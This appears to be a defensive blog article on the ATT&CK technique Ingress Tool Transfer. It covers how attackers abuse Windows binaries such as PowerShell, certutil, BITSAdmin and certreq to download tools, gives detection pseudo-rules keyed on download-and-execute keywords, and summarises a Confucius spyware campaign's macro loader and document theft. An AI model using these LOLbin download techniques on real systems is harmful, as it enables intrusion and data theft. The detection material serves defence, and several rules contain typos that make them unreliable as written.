T1105-Ingress Tool Transfer

Adversaries often download additional tools to execute various actions on compromised host machines. These tools might include tools for scanning networks to facilitate lateral movement or establishing persistent access for the attacker. Regardless of the specific tool's purpose, the process of injecting such tools into a compromised environment is nowadays considered a no-brainer.

Malicious Objectives for Ingress Tool Transfer

Administrative tooling and other native operating system binaries offer adversaries a variety of functionalities that are ripe for abuse. While an adversary can accomplish many of their objectives by living off the land, they often require non-native tooling to perform post-exploitation activity and accomplish their goals.

In real life, "living off the land" means surviving using only the natural resources around you. People do this for various reasons. Maybe they want to disconnect from society ("off the grid"), or perhaps they're avoiding someone or something. Some people simply enjoy the challenge of being self-sufficient.

In the technology world, “living off the land” (LotL) refers to attacker behavior that uses tools or features that already exist in the target environment. In this article, we’ll explore why intruders use LotL, review a selection of the tools and features they use, and discuss examples of actual LotL attacks. We’ll also provide some guidance for detecting and preventing some of the commonly used approaches.

Mechanisms of Adversaries Introduce Ingress Tool Transfer into a Compromised Environment

Adversaries utilize Ingress Tool Transfer through two primary methods:

1. Transferral via native Windows binaries: Native system binaries offer adversaries the capability to establish external network connections and download various types of files, including executables, scripts, and other binaries. This method is particularly prevalent, with adversaries frequently leveraging native system binaries for Ingress Tool Transfer. This frequent usage is a significant factor contributing to the observation of the Ingress Tool Transfer technique, often in conjunction with other ATT&CK techniques.

2. Transferral via third-party tooling: Adversaries also employ third-party tools for Ingress Tool Transfer. While native system binaries are more commonly utilized for this purpose, adversaries may opt for third-party tools in certain scenarios to achieve their objectives. However, the abuse of legitimate executables for Ingress Tool Transfer remains a primary focus due to its widespread occurrence and impact on cyber attacks.

Let's take a closer look at the non-native software that adversaries employ for transferring tools, shedding light on why they often favor native tooling. Despite the file uploading and downloading capabilities offered by most command-and-control (C2) frameworks, adversaries frequently opt for native binaries to acquire additional tools and payloads. This choice primarily stems from their desire to blend in and avoid suspicion. For example, if a process connected to a command and control server (C2) is observed downloading a file from an external network, it might trigger suspicion. However, if the same action is performed by a legitimate system process, it would seem normal.

In addition to C2 tools, adversaries also turn to remote monitoring and management (RMM) software for ingress tool transfer. However, RMM tools present challenges for adversaries, as defenders can easily block unauthorized tools, prompting adversaries to resort to renaming them to evade detection.

PowerShell (T1059.001) stands out as the most commonly abused system binary for ingress tool transfer by adversaries. Adversaries also often abuse certutil, a command-line utility that is used to display certification authority (CA) configuration information, configure Certificate Services, and back up and restore CA components. Adversaries most often use it to download additional payloads. It can also be leveraged to decode/encode data as well as interact with alternate data streams (ADS). Similarly, adversaries leverage certreq, another built-in Windows binary, to manage certificates and facilitate file transfers. Additionally, adversaries commonly misuse BITSAdmin, a utility primarily used for managing BITS jobs for downloading Windows Updates, to download arbitrary files for their malicious activities.

In the recent attacks, commonly abused binaries observed are:

• rundll32

• regsvr32

• msbuild

• msiexec

• mshta

Actions That Need to be Taken

Addressing ingress tool transfer presents challenges due to the multitude of legitimate reasons for transferring tools between machines within an environment. Offering blanket advice is difficult. However, implementing application control policies to restrict the usage of tools commonly exploited for ingress tool transfer, such as remote management tools, can be beneficial. Given the frequent co-occurrence of Ingress Tool Transfer with PowerShell, it's advisable to review and implement the mitigation strategies outlined in the PowerShell section of this report. Additionally, leveraging the Windows host firewall to block outbound network connections for commonly abused LOLbins is another effective measure to consider.

Visibility

Detecting ingress tool transfer is crucial, as it plays a role in nearly every attack. Therefore, having the necessary telemetry to observe and detect it is essential. Fortunately, numerous data sources provide visibility into this technique, with many of them accessible through EDR and other widely available security tools.

Process Monitoring:

As Ingress tool transfer often involves system processes, monitoring these processes is important for detection. However, effective detection requires more than just identifying known malicious processes. It's essential to develop detection analytics that encompass not only process names but also command-line arguments, file modifications, DLL module loads, and network connections associated with these processes.

Command Monitoring:

Command-line arguments are important aspect to be monitored for detecting adversaries loading malicious tools into your environment. Beyond detection, command lines may also serve as a pivot point for investigation, especially in cases where something like a PowerShell or cURL command line includes URLs used to host remote content for download and execution.

Network Connections:

Network connection data provides valuable insight for detecting ingress tool transfer. While network connections alone may have incomplete information, when combined with process and command-line monitoring, they become highly effective for monitoring. If an adversary is active in ingress tool transfer, external network connections are likely to occur, making network telemetry a foremost component of effective detection.

Detection Technology

Windows Security Event ID 4688: Process Creation

Enabling command-line argument logging in Windows Security Event ID 4688 enhances detection as a native telemetry source for detecting ingress tool transfer. This event log captures crucial information about process creation, providing insights into potentially malicious activity. Developing a thorough understanding of baseline process relationships within your environment is essential to effectively discriminating genuine threats from false positives.

Endpoint Detection and Response (EDR) Tools

EDR tool serves as a powerful resource for identifying Ingress Tool Transfer. This tool offers extensive visibility into various aspects of endpoint activity, including process starts, command-lines, and network connections. The capabilities of EDR tools provides organizations with the necessary monitoring to detect and respond to malicious activity effectively.

Possible Use Cases

Identifying Suspicious PowerShell Commands

Adversaries significantly depends on PowerShell for ingress tool transfer. Therefore, monitoring PowerShell process execution, along with analyzing command lines for suspicious PowerShell commands, proves effective in detecting malicious ingress tool transfers.

process == powershell.exe && command_includes ('downloadstring' || 'downloadata' || 'downloadfile' || 'iex' || '.invoke' || 'invoke-expression')

event_id=4688 && parent_process=powerhsell.exe && command_includes ('WebClient' || 'bitsadmin' || 'finger' || 'curl')

CertUtil Downloading Malicious Binaries

Adversaries frequently evade security measures by exploiting the Windows Certificate Utility (certutil.exe) to bring the malicious payload into the environment. Typically, they exploit certutil.exe in combination with the "-split" command-line option for this purpose.

process == certutil.exe && command_includes ('urlcache' && 'split')

BITSAdmin Downloading Malicious Binaries

Adversaries, including those involved in ransomware attacks, often use BITSAdmin to download malicious files from the internet as a way to bypass application blocklisting. This utility allows them to download arbitrary files while evading detection. The following detection approach focuses on the execution of bitsadmin.exe with command options that suggest a file is being downloaded:

process== bitsadmin.exe 
&& 
command_includes (download' || 'transfer')

Certreq Downloading Malicious Binaries

Similar to certutil, adversaries can abuse certreq to download and upload data. This utility is another way for adversaries to carry out their malicious activities. The following detection method focuses on identifying instances of certreq.exe execution with command options that indicate file downloads.

process== certreq.exe 
&& 
command_includes ('-post' || '-config'|| 'http' || 'get')

Real-life Example

Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021.

The campaign involves a two-step attack. During the first phase, an email without a malicious payload containing content copied from a legitimate Pakistani newspaper’s article is sent to the target. The sender address, which is spoofed, impersonates the PR wing of the Pakistani Armed Forces (info@ispr.gov.pk).

Two days later, a second email — purportedly a warning from a Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target. The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk)

If the target clicks on either the link or on the “unsubscribe” link, it will download a Word document from the domain parinari[.]xyz.

The emails are sent either from an ExpressVPN exit node in Pakistan, or from a mail server under the attacker’s control.

Examining The Encrypted Document Containing Macros

After entering the password mentioned in the message, a document containing macros is displayed on screen.

If the victim enables macros, the malicious code will be loaded. If the victim enters any phone number and clicks “SUBMIT,” the text field will be replaced by the message “Phone Number Not Found.”

Behind the scenes, a .NET DLL file named skfk.txt, which is filled with content found inside the “Comments” property of the document, is created in the temporary directory. The file is then loaded in memory via PowerShell. Following is the attack vector of malicious code:

1. Simple download & execute program. It downloads an ASCII file from the same domain, converts it into binary, loads it into memory, and jumps to a dynamic function.

2. .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and creates a scheduled task to load it.

3. Similar to Step 1, with the only change is the URL used to retrieve the next stage.

4. It is the final payload (analyzed in the next section). It is never written in clear text on the file disk.

The final payload is a .NET DLL file designed to steal documents and images. It targets files with extensions commonly associated with text documents, presentations, spreadsheets, and images. These include TXT, PDF, PNG, JPG, DOC, XLS, XLM, ODP, ODS, ODT, RTF, PPT, XLSX, XLSM, DOCX, PPTX, and JPEG. This comprehensive list encompasses a wide range of file formats, allowing the payload to potentially extract sensitive information from various document and image formats. With this capability, the payload poses a significant threat to the confidentiality of personal and organizational data.

The “Documents,” “Downloads,” “Desktop,” and “Pictures” folders of every user are checked. The DLL file also examines drives other than C:

When a file matching one of the listed extensions is found, its MD5 hash is calculated and compared to an exclusion list retrieved from the command-and-control (C&C) server pirnaram[.]xyz.

If the hash is not listed, the file is sent via the C&C to a directory named after the concatenation of the machine name and the username. The exclusion list is different for every machine name-username string.